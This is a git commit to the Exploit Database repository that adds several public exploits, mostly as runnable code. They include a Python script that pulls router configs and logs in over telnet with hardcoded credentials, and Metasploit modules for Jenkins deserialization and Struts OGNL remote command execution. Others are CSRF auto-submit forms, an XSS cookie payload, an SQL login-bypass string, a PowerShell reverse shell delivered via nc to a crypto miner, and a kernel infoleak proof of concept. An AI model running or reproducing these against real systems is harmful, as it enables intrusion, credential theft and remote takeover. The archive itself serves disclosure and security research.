DB: 2018-05-18

8 changes to exploits/shellcodes

Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall

Libuser - roothelper Privilege Escalation (Metasploit)
Libuser - 'roothelper' Privilege Escalation (Metasploit)

Inteno IOPSYS 2.0 - 4.2.0 p910nd - Remote Command Execution
Inteno IOPSYS 2.0 < 4.2.0 - 'p910nd' Remote Command Execution
Nanopool Claymore Dual Miner 7.3 - Remote Code Execution
Jenkins CLI - HTTP Java Deserialization (Metasploit)
Apache Struts 2 - Struts 1 Plugin Showcase OGNL Code Execution (Metasploit)
NodAPS 4.0 - SQL injection / Cross-Site Request Forgery
Intelbras NCLOUD 300 1.0 - Authentication bypass
SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass
Powerlogic/Schneider Electric IONXXXX Series - Cross-Site Request Forgery
This commit is contained in:
Offensive Security 2018-05-18 05:01:49 +00:00
parent 1873a7d234
commit 5aca1b9763
9 changed files with 802 additions and 2 deletions

View file

@ -0,0 +1,80 @@
# coding: utf-8
# Exploit Title: Intelbras NCloud Authentication bypass
# Date: 16/05/2018
# Exploit Author: Pedro Aguiar - pedro.aguiar@kryptus.com
# Vendor Homepage: http://www.intelbras.com.br/
# Software Link: http://www.intelbras.com.br/empresarial/wi-fi/para-sua-casa/roteadores/ncloud
# Version: 1.0
# Tested on: Linux
# CVE : CVE-2018-11094
# Description: As described here: https://blog.kos-lab.com/Hello-World/ the Ncloud 300 device does not properly
# enforce authentication, allowing an attacker to remotely download the configurations backup ('/cgi-bin/ExportSettings.sh').
# The configurations backup file contains the web interface username and password.
# Also, there are hardcoded credentials in the telnet service (root:cary), in cases where root user does not exist,
# it was replaced by the web interface credentials. This exploit downloads the backup file and tries to use the credentials
# to log into the device using telnet.
import sys
import requests
import telnetlib
import re
def help():
print 'Usage: '
print 'python exploit.py http://192.168.0.1'
def pop_shell(host, user, password):
if(user == "root"):
print '[+] Trying default credentials: root:cary'
else:
print '[+] Trying credentials obtained from /cgi-bin/ExportSettings.sh'
with open('NCLOUD_config.dat', "r") as f:
content = f.read()
user = content.split("Login=")[1].split("\n")[0]
password = content.split("Password=")[1].split("\n")[0]
#print 'User: '+ user
#print 'Password: '+ password
f.close()
try:
ip = re.findall( r'[0-9]+(?:\.[0-9]+){3}', host)[0]
tn = telnetlib.Telnet(ip, 23, timeout=10)
tn.expect(["WORKGROUP login:"], 5)
tn.write(user + "\r\n")
tn.expect(["Password:"], 5)
tn.write(password + "\r\n")
i = tn.expect(["Login incorrect"], 5)
if i[0] != -1:
raise ValueError('[-] Wrong credential')
tn.write("cat /proc/cpuinfo\r\n")
tn.interact()
tn.close()
except Exception as e:
print e
if(user == "root"):
pop_shell(host, 'try', 'again')
def exploit(host):
print '[*] Connecting to %s' %host
path = '/cgi-bin/ExportSettings.sh'
payload = 'Export=Salvar'
response = requests.post(host + path, data=payload)
response.raise_for_status()
if(response.status_code == 200 and "Login=" in response.text):
print '[+] Config download was successful'
print '[+] Saving backup file to NCLOUD_config.dat'
with open('NCLOUD_config.dat', "w") as f:
f.write(response.text)
f.close()
pop_shell(host, "root", "cary")
def main():
if len(sys.argv) < 2 or not sys.argv[1].startswith('http://'):
help()
return
host = sys.argv[1]
exploit(host)
if __name__ == '__main__':
main()

View file

@ -0,0 +1,76 @@
/*
Commit 3a4d44b61625 ("ntp: Move adjtimex related compat syscalls to native
counterparts") removed the memset() in compat_get_timex(). Since then, the
compat adjtimex syscall can invoke do_adjtimex() with an uninitialized
->tai. If do_adjtimex() doesn't write to ->tai (e.g. because the arguments
are invalid), compat_put_timex() then copies the uninitialized ->tai field
to userspace.
Demo:
$ cat leak_32.c
*/
#include <sys/timex.h>
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <stdint.h>
#include <err.h>
/* from include/linux/timex.h */
#define ADJ_ADJTIME 0x8000
int main(void) {
struct timex tx;
memset(&tx, 0, sizeof(tx));
tx.modes = ADJ_ADJTIME; /* invalid, causes early bailout */
int res = adjtimex(&tx);
assert(res == -1 && errno == EINVAL);
printf("0x%08x\n", (unsigned int)tx.tai);
return 0;
}
/*
$ gcc -o leak_32 leak_32.c -Wall -m32
$ for i in {0..10}; do sleep 1; ./leak_32; done
0x01a300b0
0x0be8f6f0
0x0610d5f0
0x01fa0170
0x0bf05670
0x0bf05670
0x0610d5f0
0x0610cd70
0x0610d5f0
0x0610d5f0
Fixed in master: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0a0b98734479aa5b3c671d5190e86273372cab95
Fix it by adding the memset() back.
Fixes: 3a4d44b61625 ("ntp: Move adjtimex related compat syscalls to native counterparts")
Signed-off-by: Jann Horn <jannh@google.com>
---
kernel/compat.c | 1 +
1 file changed, 1 insertion(+)
diff --git a/kernel/compat.c b/kernel/compat.c
index 6d21894806b4..92d8c98c0f57 100644
--- a/kernel/compat.c
+++ b/kernel/compat.c
@@ -34,6 +34,7 @@ int compat_get_timex(struct timex *txc, const struct compat_timex __user *utp)
{
struct compat_timex tx32;
+ memset(txc, 0, sizeof(struct timex));
if (copy_from_user(&tx32, utp, sizeof(struct compat_timex)))
return -EFAULT;
--
2.17.0.441.gb46fe60e1d-goog
*/

350
exploits/linux/remote/44642.rb Executable file
View file

@ -0,0 +1,350 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
STAGE1 = "aced00057372002b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e466c6174334d6170a300f47ee17184980300007870770400000002737200316f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced530200014c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b0300007870737200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c656d656e747371007e0003787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a65787000000001770400000001740008041ac080131d170678787371007e00090000000077040000000078737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e63757272656e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870707372001f636f6d2e73756e2e6a6e64692e6c6461702e4c646170417474726962757465c47b6b02a60583c00300034c000a62617365437478456e767400154c6a6176612f7574696c2f486173687461626c653b4c000a6261736543747855524c7400124c6a6176612f6c616e672f537472696e673b4c000372646e7400134c6a617661782f6e616d696e672f4e616d653b787200256a617661782e6e616d696e672e6469726563746f72792e42617369634174747269627574655d95d32a668565be0300025a00076f7264657265644c000661747472494471007e001778700074000077040000000078707400156c6461703a2f2f6c6f63616c686f73743a313233347372001a6a617661782e6e616d696e672e436f6d706f736974654e616d6517251a4b93d67afe0300007870770400000000787871007e000e707871007e000e78"
# java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections6 'touch /tmp/wtf'
STAGE2 = "aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000e746f756368202f746d702f777466740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878"
SEARCH_REQUEST = 3
SEARCH_RES_ENTRY = 4
SEARCH_RES_DONE = 5
ABANDON_REQUEST = 16
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Jenkins CLI HTTP Java Deserialization Vulnerability',
'Description' => %q{
This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on
the Jenkins, which allows remote arbitrary code execution via HTTP. Authentication is not
required to exploit this vulnerability.
},
'Author' =>
[
'Matthias Kaiser', # Original Vulnerability discovery
'Alisa Esage', # Private Exploit
'Ivan', # Metasploit Module Author
'YSOSerial' #Stage 2 payload
],
'License' => MSF_LICENSE,
'Platform' => ['linux', 'unix'],
'Arch' => ARCH_CMD,
'Targets' => [ [ 'Jenkins 2.31', {} ] ],
'References' =>
[
['CVE', '2016-9299'],
['URL', 'https://github.com/jenkinsci-cert/SECURITY-218'],
['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16'],
['URL', 'http://www.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class-deepsec-edition'],
['URL', 'https://github.com/frohoff/ysoserial']
],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 16 2016'
))
register_options([
OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
Opt::RPORT('8080'),
OptAddress.new('SRVHOST', [ true, "The local host to listen on for the ldap server. This must be an address on the local machine or 0.0.0.0", '127.0.0.1' ]),
OptPort.new('SRVPORT', [ true, "The local port to listen on for the ldap server.", 1389 ]),
OptAddress.new('LDAPHOST', [ true, "The ldap host the exploit will try to connect to ", '127.0.0.1' ])
])
end
def target_uri
begin
URI(datastore['TARGETURI'])
rescue ::URI::InvalidURIError
print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
raise Msf::OptionValidateError.new(['TARGETURI'])
end
end
def normalize_uri(*strs)
new_str = strs * "/"
new_str = new_str.gsub!("//", "/") while new_str.index("//")
# Makes sure there's a starting slash
unless new_str[0,1] == '/'
new_str = '/' + new_str
end
new_str
end
def aseq(x, tag)
s = seq(x)
s.tag_class = :APPLICATION
s.tag = tag
s
end
def seq(x)
OpenSSL::ASN1::Sequence.new(x)
end
def int(x)
OpenSSL::ASN1::Integer.new(x)
end
def string(x)
OpenSSL::ASN1::OctetString.new(x)
end
def set(x)
OpenSSL::ASN1::Set.new(x)
end
def enum(x)
OpenSSL::ASN1::Enumerated.new(x)
end
def java_string(s)
length = s.length
packed_length = [length].pack("S>")
"#{packed_length}#{s}"
end
def search_res_done(message_id)
s = seq([
int(message_id),
aseq([enum(0), string(""), string("")], SEARCH_RES_DONE)
])
s.to_der
end
def make_stage2(command)
[STAGE2].pack("H*").gsub("\x00\x0Etouch /tmp/wtf", java_string(command))
end
def make_stage2_reply(command, message_id)
java_class_name_attributes = seq([string("javaClassName"), set([string("WTF")])])
java_serialized_data_attributes = seq([string("javaSerializedData"), set([string(make_stage2(command))])])
attributes = seq([java_class_name_attributes, java_serialized_data_attributes])
s = seq([
int(message_id),
aseq([string("cn=wtf, dc=example, dc=com"), attributes], SEARCH_RES_ENTRY)])
s.to_der
end
def make_stage1(ldap_url)
[STAGE1].pack("H*").gsub("\x00\x15ldap://localhost:1234", java_string(ldap_url))
end
def read_ldap_packet(socket)
buffer = ""
bytes = socket.read(2)
if bytes[0] != "0"
raise "NOT_LDAP: #{bytes.inspect} #{bytes[0]}"
end
buffer << bytes
length = bytes[1].ord
if (length & (1<<7)) != 0
length_bytes_length = length ^ (1<<7)
length_bytes = socket.read(length_bytes_length)
buffer << length_bytes
length = length_bytes.bytes.reduce(0) {|c, e| (c << 8) + e}
end
buffer << socket.read(length)
buffer
end
def write_chunk(socket, chunk)
socket.write(chunk.bytesize.to_s(16) + "\r\n")
socket.write(chunk)
socket.write("\r\n")
end
def exploit
uuid = SecureRandom.uuid
ldap_port = datastore["SRVPORT"]
ldap_host = datastore["SRVHOST"]
ldap_external_host = datastore["LDAPHOST"]
command = payload.encoded
host = datastore["RHOST"]
ldap = TCPServer.new(ldap_host, ldap_port)
cli_path = normalize_uri(target_uri.path, "cli")
begin
download = connect()
begin
download.write("POST #{cli_path} HTTP/1.1\r\n" +
"Host: #{host}\r\n" +
"User-Agent: curl/7.36.0\r\n" +
"Accept: */*\r\n" +
"Session: #{uuid}\r\n" +
"Side: download\r\n" +
"Content-Length: 0\r\n" +
"Content-Type: application/x-www-form-urlencoded\r\n\r\n")
download.read(20)
upload = connect()
begin
upload.write("POST #{cli_path} HTTP/1.1\r\n" +
"Host: #{host}\r\n" +
"User-Agent: curl/7.36.0\r\n" +
"Accept: */*\r\n" +
"Session: #{uuid}\r\n" +
"Side: upload\r\n" +
"Content-type: application/octet-stream\r\n" +
"Transfer-Encoding: chunked\r\n\r\n")
write_chunk(upload, "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=")
write_chunk(upload, "\00\00\00\00")
upload.flush
stage1 = make_stage1("ldap://#{ldap_external_host}:#{ldap_port}")
chunk_header = [stage1.bytesize].pack("S>")
write_chunk(upload, chunk_header + stage1)
upload.flush
client = ldap.accept
begin
# this hardcodes an ldap conversation
# read bindRequest
read_ldap_packet(client)
# write bindResponse
client.write(["300c02010161070a010004000400"].pack("H*"))
# read searchRequest
read_ldap_packet(client)
# write searchResEntry
client.write(["3034020102642f04066f753d777466302530230411737562736368656d61537562656e747279310e040c636e3d737562736368656d61"].pack("H*"))
# write searchResDone
client.write(search_res_done(2))
# read abandonReqeust or searchRequest
bytes = read_ldap_packet(client)
packet = OpenSSL::ASN1.decode(bytes)
# abandonRequest packet is sometimes sent
# so we distinguish between abandonRequest/searchRequest
tag = packet.value[1].tag
if tag == ABANDON_REQUEST
bytes = read_ldap_packet(client)
packet = OpenSSL::ASN1.decode(bytes)
tag = packet.value[1].tag
end
if tag == SEARCH_REQUEST
message_id = packet.value[0].value.to_int
# write searchResEntry
client.write(make_stage2_reply(command, message_id))
# write searchResDone
client.write(search_res_done(message_id))
else
raise "Unexpected packet: #{tag}"
end
client.flush
ensure
client.close
end
ensure
upload.close
end
ensure
download.close
end
ensure
ldap.close
end
end
def check
result = Exploit::CheckCode::Safe
begin
if vulnerable?
result = Exploit::CheckCode::Vulnerable
end
rescue Msf::Exploit::Failed => e
vprint_error(e.message)
return Exploit::CheckCode::Unknown
end
result
end
def vulnerable?
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path)
})
unless res
fail_with(Failure::Unknown, 'The connection timed out.')
end
http_headers = res.headers
http_headers['X-Jenkins'] && http_headers['X-Jenkins'] <= "2.31"
end
# Connects to the server, creates a request, sends the request,
# reads the response
#
# Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.
#
def send_request_cgi(opts={}, timeout = 20)
begin
c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])
c.connect
r = c.request_cgi(opts)
c.send_recv(r, timeout)
rescue ::Errno::EPIPE, ::Timeout::Error
nil
end
end
end

View file

@ -0,0 +1,62 @@
# Exploit Title: Powerlogic Schneider Electric IONXXXX Series - Cross-Site Request Forgery
# Date: 2018-05-17
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.schneider-electric.com/
# Version: ION73XX series, ION75XX series, ION76XX series, ION8650 series, ION8800 series, PM5XXX series.
# Tested on: All Version
# CVE : CVE-2016-5809
# PoC
<form name="frmConfig" action="http://TargetIp/SetupReceipt.html
<http://targetip/SetupReceipt.html>" method="post">
select name="PMLSel_0x7800">
<option selected="selected">9S - 4 Wire Wye/Delta</option>
<option>35S - 3 Wire</option>
<option>36S - 4 Wire Wye</option>
<option>DEMO</option>
</select>
<select name="PMLSel_0x7a4a">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<input type="text" name="PMLIFl_0x7000" size="15" value="480.00"/>
<select name="PMLSel_0x7a4b">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<input type="text" name="PMLIFl_0x7001" size="15" value="480.00"/>
<select name="PMLSel_0x7a4c">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<input type="text" name="PMLIFl_0x7002" size="15" value="200.00"/>
<input type="text" name="PMLIFl_0x7003" size="15" value="5.00"/>
<select name="PMLSel_0x7801">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<select name="PMLSel_0x7802">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<select name="PMLSel_0x7803">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<input type="text" name="PMLIFl_0x7004" size="15" value="5.00"/>
<select name="PMLSel_0x7a49">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<input type="text" name="PMLIFl_0x7005" size="15" value="5.00"/>
<input type="text" name="PMLIFl_0x721a" size="15" value="0.00"/>
<input type="text" name="PMLIStr_0x1345" size="15" value="EPMAPS"/>
<input type="text" name="PMLIFl_0x70b4" size="15" value="900.00"/>
<input type="text" name="PMLIStr_0x1346" size="15" value="POZO SAN"/>
<input type="text" name="PMLIFl_0x70c4" size="15" value="1.00"/>
<input type="text" name="PMLIStr_0x1347" size="15" value="ANTONIO PICHIN."/>
<input type="text" name="PMLIFl_0x70d4" size="15" value="70.00"/>
<input type="submit" class="btn" value="Save" name="Submit22" />
</form>

117
exploits/multiple/remote/44643.rb Executable file
View file

@ -0,0 +1,117 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution',
'Description' => %q{ This module exploits a remote code execution vulnerability in the Struts Showcase app in the Struts 1 plugin example in Struts 2.3.x series. Remote Code Execution can be performed via a malicious field value. },
'License' => MSF_LICENSE,
'Author' => [
'icez <ic3z at qq dot com>',
'Nixawk',
'xfer0'
],
'References' => [
[ 'CVE', '2017-9791' ],
[ 'BID', '99484' ],
[ 'EDB', '42324' ],
[ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-048' ]
],
'Privileged' => true,
'Targets' => [
[
'Universal', {
'Platform' => %w{ linux unix win },
'Arch' => [ ARCH_CMD ]
}
]
],
'DisclosureDate' => 'Jul 07 2017',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/integration/saveGangster.action' ]),
OptString.new('POSTPARAM', [ true, 'The HTTP POST parameter', 'name' ])
]
)
end
def send_struts_request(ognl)
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(4)
uri = normalize_uri(datastore['TARGETURI'])
data = {
datastore['POSTPARAM'] => ognl,
'age' => var_a,
'__checkbox_bustedBefore' => 'true',
'description' => var_b
}
resp = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'vars_post' => data
})
if resp && resp.code == 404
fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
end
resp
end
def check
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(4)
ognl = "%{'#{var_a}' + '#{var_b}'}"
begin
resp = send_struts_request(ognl)
rescue Msf::Exploit::Failed
return Exploit::CheckCode::Unknown
end
if resp && resp.code == 200 && resp.body.include?("#{var_a}#{var_b}")
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def exploit
resp = exec_cmd(payload.encoded)
unless resp and resp.code == 200
fail_with(Failure::Unknown, "Exploit failed.")
end
print_good("Command executed")
print_line(resp.body)
end
def exec_cmd(cmd)
ognl = "%{(#_='multipart/form-data')."
ognl << "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
ognl << "(#_memberAccess?(#_memberAccess=#dm):"
ognl << "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
ognl << "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
ognl << "(#ognlUtil.getExcludedPackageNames().clear())."
ognl << "(#ognlUtil.getExcludedClasses().clear())."
ognl << "(#context.setMemberAccess(#dm))))."
ognl << "(#cmd='#{cmd}')."
ognl << "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
ognl << "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start())."
ognl << "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
ognl << "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
send_struts_request(ognl)
end
end

View file

@ -0,0 +1,44 @@
# Exploit Title: Online Booking system - NodAPS 4.0 - 'search' SQL injection / Cross-Site Request Forgery
# Date: 2018-05-16
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/appointment-management-system-nodaps/16197805?s_rank=1535
# Version: 4.0
# Tested on: windows
================================================
# POC 1 : SQLi
# test : test.com/en/providers?search='
# Description: Put ' in the search parameter and you will have SQL syntax error.
You can use "extractvalue()" or "updatexml()" functions to get data from database.
================================================
# POC 2 : CSRF
# Description: An issue was discovered in Online Booking system - NodAPS 4.0 script.
With Cross-site request forgery (CSRF) vulnerability , attacker can hijack the authentication of users remotely.
================================================
# Exploit :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://test.com/admin/accountSetting" method="POST">
<input type="hidden" name="data&#91;username&#93;" value="testcsrf />
<input type="hidden" name="data&#91;email&#93;" value="lord&#46;nematzadeh123&#64;gmail&#46;com" />
<input type="hidden" name="data&#91;firstname&#93;" value="test2" />
<input type="hidden" name="data&#91;lastname&#93;" value="test3" />
<input type="hidden" name="data&#91;mobile&#93;" value="1000000000" />
<input type="hidden" name="data&#91;website&#93;" value="" />
<input type="hidden" name="data&#91;password&#93;" value="1234567890&#45;" />
<input type="hidden" name="data&#91;language&#95;id&#93;" value="1" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

View file

@ -0,0 +1,38 @@
# Exploit Title: SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass
# Date: 2018-05-17
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/supercom-online-shopping-ecommerce-cart/17085987?s_rank=1442
# Version: 1
# Tested on: Kali linux
# Description: SuperCom - Online Shopping Ecommerce Cart 1 suffers from multiple vulnerabilities :
# POC 1 : Persistent cross site scripting :
1) After creating an account , go to your profile.
2) Navigate to "Update profile" and put this payload :
"/><script>alert(document.cookie)</script>
3) You will get an alert box in the page .
# POC 2 : CSRF : Attacker can change user's authentication directly :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://ecommerce.thesoftking.com/updateprofile"
method="post">
<input type="hidden" name="name" value="anything">
<input type="hidden" name="mobile" value="1000000000">
<input type="hidden" name="address" value="anything">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# POC 3 : Authentication bypass :
Path : /admin
Username : ' or 0=0 #
Password : anything

View file

@ -0,0 +1,25 @@
# Exploit Title: Nanopool Claymore Dual Miner >= 7.3 Remote Code Execution
# Date: 2018/02/09
# Exploit Author: ReverseBrain
# Vendor Homepage: https://nanopool.org/
# Software Link: https://github.com/nanopool/Claymore-Dual-Miner
# Version: 7.3 and later
# Tested on: Windows, Linux
# CVE : 2018-1000049
Suppose the miner is running on localhost on port 3333. First of all you need to convert a .bat string into hexadecimal format, for example, this one uses powershell to spawn a reverse shell on localhost listening on port 1234:
powershell.exe -Command "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Convert it into hexadecimal and paste it on the second parameter inside this string:
echo '{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat","HEX_STRING"]}' | nc 127.0.0.1 3333 -v
Then, to trigger the vulnerability just send {"id":0,"jsonrpc":"2.0","method":"miner_reboot"}
string to the miner.
echo '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}' | nc 127.0.0.1 3333 -v
You got the shell!
This exploit works also on Linux, just substitute reboot.bat with reboot.bash or reboot.sh.

View file

@ -5972,6 +5972,7 @@ id,file,description,date,author,type,platform,port
44615,exploits/windows/dos/44615.cpp,"2345 Security Guard 3.7 - '2345BdPcSafe.sys' Denial of Service",2018-05-11,anhkgg,dos,windows,
44619,exploits/windows/dos/44619.cpp,"2345 Security Guard 3.7 - '2345NsProtect.sys' Denial of Service",2018-05-14,anhkgg,dos,windows,
44629,exploits/ios/dos/44629.py,"WhatsApp 2.18.31 - Memory Corruption",2018-05-16,"Juan Sacco",dos,ios,
44641,exploits/linux/dos/44641.c,"Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall",2018-05-17,"Google Security Research",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9714,7 +9715,7 @@ id,file,description,date,author,type,platform,port
44603,exploits/windows/local/44603.txt,"Microsoft Windows FxCop 10/12 - XML External Entity Injection",2018-05-09,hyp3rlinx,local,windows,
44614,exploits/windows/local/44614.txt,"EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection",2018-05-11,"Paul Taylor",local,windows,
44630,exploits/windows/local/44630.txt,"Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation",2018-05-16,"Google Security Research",local,windows,
44633,exploits/linux/local/44633.rb,"Libuser - roothelper Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux,
44633,exploits/linux/local/44633.rb,"Libuser - 'roothelper' Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16490,7 +16491,10 @@ id,file,description,date,author,type,platform,port
44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
